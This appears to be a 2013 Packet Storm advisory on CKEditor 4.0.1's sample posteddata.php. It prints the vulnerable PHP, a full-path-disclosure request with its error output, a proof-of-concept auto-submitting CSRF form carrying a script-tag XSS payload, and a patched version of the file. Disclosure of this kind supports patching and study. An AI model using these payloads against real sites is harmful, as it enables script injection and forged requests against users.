what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CKEditor 4.0.1 CSRF / XSS / Path Disclosure

CKEditor 4.0.1 CSRF / XSS / Path Disclosure
Posted Feb 19, 2013
Authored by Akastep

CKEditor version 4.0.1 suffers from cross site request forgery, cross site scripting, and path disclosure vulnerabilities.

tags | exploit, vulnerability, xss, file inclusion, info disclosure, csrf
SHA-256 | 2c20ce891948eae0f4f51822b52a5828b5323feb467a4e2335e8e988ab6aa4ce

CKEditor 4.0.1 CSRF / XSS / Path Disclosure

Change Mirror Download
===========================================
Vulnerable Software: ckeditor 4.0.1 standard
Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulns: Full Path Disclosure && XSS
===========================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable Code: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================

root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
<meta charset="utf-8">
<title>Sample &mdash; CKEditor</title>
<link rel="stylesheet" href="sample.css">
</head>
<body>
<h1 class="samples">
CKEditor &mdash; Posted Data
</h1>
<table border="1" cellspacing="0" id="outputSample">
<colgroup><col width="120"></colgroup>
<thead>
<tr>
<th>Field&nbsp;Name</th>
<th>Value</th>
</tr>
</thead>
<?php

if ( isset( $_POST ) )
$postArray = &$_POST ; // 4.1.0 or later, use $_POST
else
$postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes( $value ) ) ;
else
$postedValue = htmlspecialchars( $value ) ;

?>
<tr>
<th style="vertical-align: top"><?php echo $sForm?></th>
<td><pre class="samples"><?php echo $postedValue?></pre></td>
</tr>
<?php
}
?>
</table>
<div id="footer">
<hr>
<p>
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
</p>
<p id="copy">
Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
</p>
</div>
</body>
</html>


=============SNIP ENDS HERE====================



FULL Path Disclosure example:

URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST

HEADERS:

Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30



$_POST DATA TO SEND:


bangbangbang[]=PATH DISCLOSURE




Result:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png


=================================================

CSRF+XSS
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
</form>

=================================================

Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png



=================================================
And here is fixed version: /ckeditor/samples/assets/posteddata.php

================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
<meta charset="utf-8">
<title>Sample &mdash; CKEditor</title>
<link rel="stylesheet" href="sample.css">
</head>
<body>
<h1 class="samples">
CKEditor &mdash; Posted Data
</h1>
<table border="1" cellspacing="0" id="outputSample">
<colgroup><col width="120"></colgroup>
<thead>
<tr>
<th>Field&nbsp;Name</th>
<th>Value</th>
</tr>
</thead>
<?php

if ( isset( $_POST ) )
$postArray = &$_POST ; // 4.1.0 or later, use $_POST
else
$postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
if ( get_magic_quotes_gpc() )
$postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;
else
$postedValue =htmlspecialchars((string) $value ) ;

?>
<tr>
<th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>
<td><pre class="samples"><?php echo $postedValue?></pre></td>
</tr>
<?php
}
?>
</table>
<div id="footer">
<hr>
<p>
CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
</p>
<p id="copy">
Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
</p>
</div>
</body>
</html>

=============ENJOYYY====================

KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
===========================================

/AkaStep


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close